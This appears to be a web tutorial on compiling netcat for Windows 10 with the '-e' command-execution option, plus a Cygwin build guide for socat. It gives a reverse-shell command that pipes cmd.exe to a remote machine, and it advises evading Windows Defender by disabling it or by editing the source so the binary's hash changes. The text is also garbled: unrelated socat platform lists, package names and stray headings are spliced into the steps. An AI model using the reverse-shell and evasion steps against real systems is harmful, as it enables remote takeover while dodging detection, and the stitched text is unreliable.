These steps will compile an executable (default: nc.exe) on a Windows 10 machine. This build will enable the “-e” command line option (also known as “GAPING_SECURITY_HOLE”). The “-e” option allows you to pass a command into NetCat; example:
To create a reverse shell:
Installing Cygwin Install Cygwin by running setup-x8664.exe Use the setup program to perform a fresh install or to update an existing installation. Keep in mind that individual packages in the distribution are updated separately from the DLL so the Cygwin DLL version is not useful as a general Cygwin. Platforms - socat 1.7.0 was compiled and more or less successfully tested under the following operating systems: Debian lenny/sid on x86, kernel 2.6.24 FreeBSD 6.1 on x86 NetBSD 4.0 on x86 OpenBSD 4.3 on x86 OpenSolaris 10 on x86 with gcc Mac OS X 10.5.5 on iMac G5, with libreadline HP-UX 11.23 AIX 5.3 on 64bit Power4 with gcc Cygwin 1.5.25. Socat-debuginfo-1.7.3.4-1 - socat-debuginfo: Debug info for socat; socat-debuginfo-1.7.3.4-2 - socat-debuginfo: Debug info for socat; socat2-debuginfo-2.0.0-0.1.b9 - socat2-debuginfo: Debug info for socat2; transmission-debuginfo-2.92-3 - transmission-debuginfo: Debug info for transmission (installed binaries and support files).
nc <remote control machine> <remote control port> -e cmd.exe
The caveat for Windows 10 is that Window’s Defender detects nc.exe as being “malware” and deletes it. Therefore beware the git repo we use here does have a compiled version. If you have Windows Defender active this file will likely be deleted. When you compile a new nc.exe it too will likely be deleted.
Window Defender Workaround
You have two easy options to get around Window Defender.
- Disable Windows Defender while you use netcat or;
- Before you compile edit a source file. There are numerous areas, especially in netcat.c where status messages (such as at line 381) are sent as output to a terminal. If you change the message, then compile, you will change the hash of the file. Windows Defender seems to be largely tied to file hashes.
Let’s Build NetCat
It is useful if you are using an account with elevated permissions.
1) Download the Windows NetCat source code.
2) Download MinGW
3) Configure MinGW
3a) If the MinGW “Installation Manager” does not auto-start after the installation of MinGW has completed run it:
Start>MinGW Installation Manager
4) From the MinGW Installation Manager I needed to select the following plugins:
4a) mingw32-developer-toolkit
4b) mingw32-base
4c) mingw32-gcc-g++
4d) mingw32-gcc-objc
4e) mysys-base
5) Apply the selected plugins:
Install Socat Cygwin
Installation > Apply Changes
6) Make sure your PATH system variable includes a reference to the MinGW DLLs.
6a) The default path is:
C:MinGWbin
6b) Start > Control Panel > Advanced Settings > Environment Variables
6c) Select “Path” from “User variables for [your user name]”.
6d) Select Edit…
6e) Add the path the the DLL folder (default: c:MinGWbin).
6f) Apply Changes / Close Control Panel Windows
6g) Restart Windows
7) Verify the gcc compiler is includes references to the DLL path.
7a) Open CMD and type:
gcc -print-search-dirs
7b) Amoung other things you should see references to /mingw32/bin
8) Still in CMD navigate to the folder which holds the NetCat source files.
8a) Run makewin.cmd
8b) You may get the following error:
Access is denied.
0 file(s) copied.
Operation Completed
As long as there are no other errors (not talking about warnings) you should be fine. What happens is the default makewin.cmd script attempts to copy the newly complied nc.exe file into your system32 folder (which if you get this error cannot be done because that folder is protected). This error can be ignored as you have the compiled binary in the folder you are currently in.
8c) There will be some warnings that look like errors.
You now have a compiled nc.exe which is able to run on Windows 10. You can pass in the -e argument.
Read up on how to use NetCat:
What is socat?
socat is a computer networking utility for reading from and writing to network connections using TCP or UDP.
Developed by Gerhard Rieger - http://www.dest-unreach.org/socat
How to install in Windows
1. Download and install Cygwin from https://www.cygwin.com
2. Install additional Cygwin packages:
- gcc-g++
- gcc-core
- cygwin32-gcc-g++
- cygwin32-gcc-core
- make
3. Download socat current version http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz
4. Open Cygwin prompt and chage to directory where downloaded socat
tar zxvf socat-1.7.3.2.tar.gz
cd socat-1.7.3.2
./configure
make
make install
Install Socat Windows 10
Done!
Nice things to do with socat
https://blog.chmd.fr/ssh-over-ssl-episode-2-replacing-proxytunnel-with-socat.html
http://www.bitkistl.com/2016/03/socat-by-example.html
Install Socat On Windows
;-)